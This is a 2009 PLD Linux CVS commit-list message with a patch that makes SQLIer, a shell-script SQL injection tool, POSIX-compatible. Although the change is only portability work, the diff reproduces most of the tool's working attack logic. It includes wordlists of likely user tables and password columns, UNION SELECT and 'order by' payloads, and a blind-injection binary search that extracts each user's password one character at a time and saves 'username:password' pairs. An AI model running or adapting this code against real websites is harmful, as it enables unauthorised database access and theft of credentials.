SOURCES: sqlier-bashism.patch (NEW) - make posix compatible (pdksh actually)
glen
glen at pld-linux.org
Wed Apr 15 11:08:20 CEST 2009
Author: glen Date: Wed Apr 15 09:08:20 2009 GMT
Module: SOURCES Tag: HEAD
---- Log message:
- make posix compatible (pdksh actually)
---- Files affected:
SOURCES:
sqlier-bashism.patch (NONE -> 1.1) (NEW)
---- Diffs:
================================================================
Index: SOURCES/sqlier-bashism.patch
diff -u /dev/null SOURCES/sqlier-bashism.patch:1.1
--- /dev/null Wed Apr 15 11:08:21 2009
+++ SOURCES/sqlier-bashism.patch Wed Apr 15 11:08:14 2009
@@ -0,0 +1,247 @@
+--- sqlier.sh 2009-04-15 12:06:51.613456809 +0300
++++ /usr/bin/sqlier 2009-04-15 12:04:59.420142504 +0300
+@@ -1,4 +1,4 @@
+-#!/bin/bash
++#!/bin/sh
+
+ #
+ # SQLIer - Version 0.8b
+@@ -13,10 +13,11 @@
+ tblnms="users,user,members,phpbb_users,vb3_user,ibf_members,bbusers,bbuser,usrs,usr,accounts,account,accnts,accnt,customers,customer"
+ unflds="username,name,user,user_name,user_username,uname,user_uname,usern,user_usern,un,user_un,usrnm,user_usrnm,usr,usernm,user_usernm,nm,user_nm"
+ pwflds="password,user_password,pass_hash,hash,pass,user_pass,pword,user_pword,passwd,user_passwd,passw,user_passw,pwrd,user_pwrd,pwd,user_pwd"
++stdout="/proc/self/fd/1"
+
+ # Options Stuff
+ sleeptime=0
+-function strip_url(){ echo "$1" | sed -r "s/^([^\?\&\#]*).*?/\1/g"; }
++strip_url(){ echo "$1" | sed -r "s/^([^\?\&\#]*).*?/\1/g"; }
+ while [ ! -z "$1" ]; do
+ case "$1" in
+ -c) shift; clearhost="$1"; url=1; break ;;
+@@ -62,8 +63,8 @@
+ exit
+ fi
+
+-function clear_host(){
+- temp="`tempfile`"
++clear_host(){
++ temp=`mktemp`
+ cat $HOME/.sqlier/exploits | grep -vE "^$1 " > $temp
+ rm $HOME/.sqlier/exploits
+ mv $temp $HOME/.sqlier/exploits
+@@ -77,14 +78,14 @@
+ fi
+
+ # FUNCTIONS #
+-function reqcnt(){
++reqcnt(){
+ req="`cat $reqfile`"
+- let req+=1
++ req=$((req+1))
+ echo "$req" > $reqfile
+ }
+
+ # save to ~/.sqlier/exploits
+-function save(){
++save(){
+ [ ! -d "$HOME/.sqlier" ] && mkdir "$HOME/.sqlier"
+ status_str="`get_status`"
+ [ -e "$HOME/.sqlier/exploits" ] && clear_host $host
+@@ -92,7 +93,7 @@
+ echo "Saved information to ~/.sqlier/exploits"
+ }
+
+-function quit(){
++quit(){
+ reqs="`cat $reqfile`"
+ rm $reqfile
+ [ -z "$1" ] && save
+@@ -101,15 +102,21 @@
+ }
+
+ # one liners
+-function addslashes(){ echo "$1" | sed -r "s/\"/\\\\\"/g"; }
+-function chr(){ echo "print chr($max)" | python; }
+-function ord(){ echo -n $1 | od -d | sed -r "s/[ ]+/ /g" | awk "{print \$2}" | grep -v "^$"; }
+-function b64e(){ str="`addslashes "$1"`"; echo -e "import base64\nprint base64.encodestring(\"\"\"$str\"\"\")" | python | sed -r "s/[\n ]//g"; }
+-function b64d(){ str="`addslashes "$1"`"; echo -e "import base64\nprint base64.decodestring(\"\"\"$str\"\"\")" | python; }
++addslashes(){ echo "$1" | sed -r "s/\"/\\\\\"/g"; }
++chr(){ echo "print chr($max)" | python; }
++ord(){ echo -n $1 | od -d | sed -r "s/[ ]+/ /g" | awk "{print \$2}" | grep -v "^$"; }
++b64e(){ str=`addslashes "$1"`; echo -e "import base64\nprint base64.encodestring(\"\"\"$str\"\"\")" | python | sed -r "s/[\n ]//g"; }
++b64d(){ str=`addslashes "$1"`; echo -e "import base64\nprint base64.decodestring(\"\"\"$str\"\"\")" | python; }
++# return n chars from right
++right() { awk -vs="$1" -vn="$2" 'BEGIN{l = length(s); i = 1 + l - n; print substr(s, i, n); exit}'; }
++# trim n chars from right
++rtrim() { awk -vs="$1" -vn="$2" 'BEGIN{l = length(s); i = l - n; print substr(s, 1, i); exit}'; }
++# return char at position n
++charat() { awk -vs="$1" -vn="$2" 'BEGIN{print substr(s, n, 1); exit}'; }
+
+-function get_status(){ enc="`b64e "$commstr:$fieldcnt:$tblnm:$unfld:$pwfld:$wgetopts"`"; echo $enc; }
++get_status(){ enc="`b64e "$commstr:$fieldcnt:$tblnm:$unfld:$pwfld:$wgetopts"`"; echo $enc; }
+
+-function sqli(){
++sqli(){
+ [ ! -z "$sleeptime" ] && [ -z "$2" ] && sleep $sleeptime
+ newurl="`echo "$url$1" | sed "s/ /%20/g"`"
+ newurl="`addslashes "$newurl"`"
+@@ -118,19 +125,19 @@
+ reqcnt
+ }
+
+-function sameperc(){
+- file1="`tempfile`"
+- file2="`tempfile`"
++sameperc(){
++ file1=`mktemp`
++ file2=`mktemp`
+ echo "$1" > $file1
+ echo "$2" > $file2
+ tot="`cat "$file1" "$file2" | wc -c`"
+ diffmnt="`diff "$file1" "$file2" | grep "^[<>]" | sed -r "s/^..(.*)$/\1/g" | wc -c`"
+ rm "$file1" "$file2"
+- let "sameperc=(($tot-$diffmnt)*100)/$tot"
++ sameperc=$(((($tot-$diffmnt)*100)/$tot))
+ echo $sameperc
+ }
+
+-function proximity(){
++proximity(){
+ comp1="`sameperc "$1" "$success"`"
+ comp2="`sameperc "$1" "$null"`"
+ comp3="`sameperc "$1" "$fail"`"
+@@ -141,29 +148,29 @@
+ else [ "$comp1" -ge "$comp2" ] && echo 1; fi
+ }
+
+-function spaceit(){
++spaceit(){
+ spaces=""
+- i=0; while let i+=1 && [ "$i" -le "$1" ]; do spaces+=" "; done
++ i=0; while i=$((i+1)) && [ "$i" -le "$1" ]; do spaces="$spaces "; done
+ }
+
+-function loop_fields(){
++loop_fields(){
+ loflds="$1"
+ dotbl="$2"
+ lofld=""
+ prev=0
+- i=0; while let i+=1 && [ ! -z "`echo "$loflds" | cut -d ',' -f$i`" ]; do
++ i=0; while i=$((i+1)) && [ ! -z "`echo "$loflds" | cut -d ',' -f$i`" ]; do
+ lo="`echo "$loflds" | cut -d ',' -f$i`"
+ [ -z "$dotbl" ] && usel="`sqli " limit 0 union select $lo$fieldstrn from $tblnm limit 1$comstr"`"\
+ || usel="`sqli " limit 0 union select $fieldstr from $lo limit 1$comstr"`"
+ [ "`proximity "$usel"`" ] && lofld="$lo" && break
+- let prev=${#lo}
++ prev=${#lo}
+ [ "$lo" = "$loflds" ] && break
+ done
+ echo "$lofld"
+ }
+ # END FUNCTIONS #
+
+-reqfile="`tempfile`"
++reqfile=`mktemp`
+ echo 0 > $reqfile
+
+ if [ -e "$HOME/.sqlier/exploits" ]; then
+@@ -215,20 +222,20 @@
+
+ # fieldcnt
+ max=0; min=1; while [ "`proximity "$maxord"`" ] || [ "$max" = "0" ]; do
+- let max+=10
++ max=$((max+10))
+ maxord="`sqli " order by $max limit 1$comstr"`"
+ done
+
+- while let c=$max-1 && [ "$c" != "$min" ]; do
+- let check=($min+$max)/2
++ while c=$(($max-1)) && [ "$c" != "$min" ]; do
++ check=$((($min+$max)/2))
+ chk="`sqli " order by $check limit 1$comstr"`"
+ [ "`proximity "$chk"`" ] && min="$check" || max="$check"
+ done
+
+ fieldcnt="$min"
+ fi
+-fieldstr="1"; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstr+=",$i"; let i+=1; done
+-fieldstrn=""; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstrn+=",$i"; let i+=1; done
++fieldstr="1"; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstr="$fieldstr,$i"; i=$((i+1)); done
++fieldstrn=""; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstrn="$fieldstrn,$i"; i=$((i+1)); done
+ echo " \"$fieldcnt\""
+
+ echo -n "determining if UNION SELECT vulnerable..."
+@@ -244,7 +251,7 @@
+
+ if [ ! -z "$tblnm" ]; then
+
+- if [ "${tblnm:${#tblnm}-7:7}" = "members" ]; then
++ if [ "$(right "$tblnm")" = "members" ]; then
+ usel="`sqli " limit 0 union select $fieldstr from ${tblnm}_converge limit 1$comstr"`"
+ if [ "`proximity "$usel"`" ]; then
+ ibf=1
+@@ -267,9 +274,9 @@
+ echo
+ echo -n "Not enough information to complete exploit... need "
+ [ -z "$tblnm" ] && need="table name, "
+- [ -z "$unfld" ] && need+="username field, "
+- [ -z "$pwfld" ] && need+="password field, "
+- echo "${need:0:${#need}-2}"
++ [ -z "$unfld" ] && need="${need}username field, "
++ [ -z "$pwfld" ] && need="${need}password field, "
++ rtrim "$need" 2
+ quit 1
+ fi
+ echo
+@@ -281,14 +288,14 @@
+ echo
+ echo
+
+-k=0; while let k+=1 && username="`echo "$usernames" | cut -d ',' -f$k`" && [ ! -z "$username" ]; do
++k=0; while k=$((k+1)) && username="`echo "$usernames" | cut -d ',' -f$k`" && [ ! -z "$username" ]; do
+ i=1
+ userstr="concat("
+ while [ "$i" -le "${#username}" ]; do
+- userstr+="char("`ord ${username:$i-1:1}`"),"
+- let i+=1
++ userstr="${userstr}char("`ord $(charat "$username" $i)`"),"
++ i=$((i+1))
+ done
+- userstr="${userstr:0:${#userstr}-1})"
++ userstr="$(rtrim "$userstr" 1))"
+
+ if [ "$k" = "1" ]; then
+ fail="$bfail"
+@@ -296,7 +303,7 @@
+ null="`sqli " limit 0 union select $fieldstr from $tblnm limit 0$comstr"`"
+ fi
+
+- function inject(){
++ inject(){
+ passstr="ord(substring($pwfld,$1,1))>$2"
+ [ -z "$ibf" ] && usel="`sqli " limit 0 union select $fieldstr from $tblnm where $unfld=$userstr and $passstr limit 1$comstr"`"\
+ || usel="`sqli " limit 0 union select $fieldstr from $tblnm, ${tblnm}_converge where $unfld=$userstr and id=converge_id and $passstr limit 1$comstr"`"
+@@ -309,16 +316,16 @@
+ while [ ! -z "`inject $charno 0`" ]; do
+ min=0
+ max=128
+- while let c=$max-1 && [ "$c" != "$min" ]; do
+- let check=($max+$min)/2
++ while c=$(($max-1)) && [ "$c" != "$min" ]; do
++ check=$((($max+$min)/2))
+ [ ! -z "`inject $charno $check`" ] && min="$check" || max="$check"
+ done
+ chr="`chr $max`"
+ echo -n $chr
+- wholepass+="$chr"
+- let charno+=1
++ wholepass="$wholepass$chr"
++ charno=$((charno+1))
+ done
+- let passlen=$charno-1
++ passlen=$(($charno-1))
+ echo
+
+ [ ! -z "$outputfile" ] && echo "$username:$wholepass" >> $outputfile
================================================================
More information about the pld-cvs-commit
mailing list